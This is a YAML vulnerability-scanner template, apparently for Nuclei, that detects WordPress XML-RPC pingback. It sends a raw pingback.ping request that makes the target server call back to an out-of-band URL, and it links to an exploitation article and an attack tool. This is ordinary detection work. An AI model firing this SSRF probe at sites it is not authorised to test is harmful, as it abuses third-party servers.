id: wp-xmlrpc-pingback-detection
info:
name: Wordpress XMLRPC Pingback detection
author: pdteam
severity: info
tags: wordpress,ssrf,oast,xmlrpc
reference:
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
requests:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://{{interactsh-url}}</string>
</value>
</param>
<string>{{BaseURL}}/?p=1</string>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"